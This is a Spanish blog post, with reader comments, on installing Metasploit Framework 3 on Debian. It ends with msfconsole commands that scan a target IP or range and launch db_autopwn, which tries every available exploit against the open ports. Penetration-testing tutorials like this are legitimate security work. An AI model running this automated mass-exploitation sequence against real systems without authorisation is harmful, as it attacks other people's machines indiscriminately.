Esta mañana me ha dado por probar metasploit framework en debian, en su version 3.0 hecha en ruby y con la funcion “db_autopwn” (ninja, como lo han llamado algunos).
Nota: Este tutorial sobre su instalacion tambien deberia ser valido en cualquier otra derivada de debian (como ubuntu).
Primero, instalamos svn, ruby on rails, gems, el servidor de postgresql y sus encabezados:
apt-get install libgems-ruby1.8 libopenssl-ruby1.8 libreadline-ruby1.8 libruby1.8 ruby ruby1.8 ruby1.8-dev rubygems subversion postgresql postgresql-8.3 postgresql-client-8.3 postgresql-client-common postgresql-common postgresql-server-dev-8.3
Ahora instalamos con gem Active Record y PostgreSQL:
gem install activerecord postgres
Ahora creamos una nueva base de datos llamada “metasploitdb” en nuestra home:
/usr/lib/postgresql/bin/initdb ~/metasploitdb /usr/lib/postgresql/bin/pg_ctl -D ~/metasploitdb start
Nos queda lo principal: instalar metasploit, yo lo voy a instalar en /opt:
svn checkout http://metasploit.com/svn/framework3/trunk framework3
Así ya lo tenemos instalado en /opt/framework3/, ahora vamos a cargar, dentro de msf, el modulo db_postgres:
/opt/framework3/msfconsole
msf> load db_postgres msf> db_create msf> db_nmap IP-O-RANGO-DESTINO msf> db_autopwn -t -p -e
Y voilá, esto escaneara los puertos de la ip o el rango de destino y prueba todos los exploits posibles en los puertos abiertos…





Siento decirte que tus instrucciones dan fallos en el db_nmap, algo de..
psql: FATAL: la autentificación Ident falló para el usuario «%user%
Vaya, que cantidad de datos… este post tiene bastante tiempo, asi que puede haber cambiado algo, a mi en su dia me funciono asi. De todos modos, estoy probando a volver a instalarlo ahora
para isntalar svn, ruby on rails, gems, te falto en el comando que das que es: apt-get install libgems-ruby1.8 libopenssl-ruby1.8 libreadline-ruby1.8 libruby1.8 ruby ruby1.8 ruby1.8-dev rubygems subversion postgresql postgresql-8.3 postgresql-client-8.3 postgresql-client-common postgresql-common postgresql-server-dev-8.3
agragar antes que todo eso el sudo y luego el comando para qeu se instales pero muy buen aporte gracias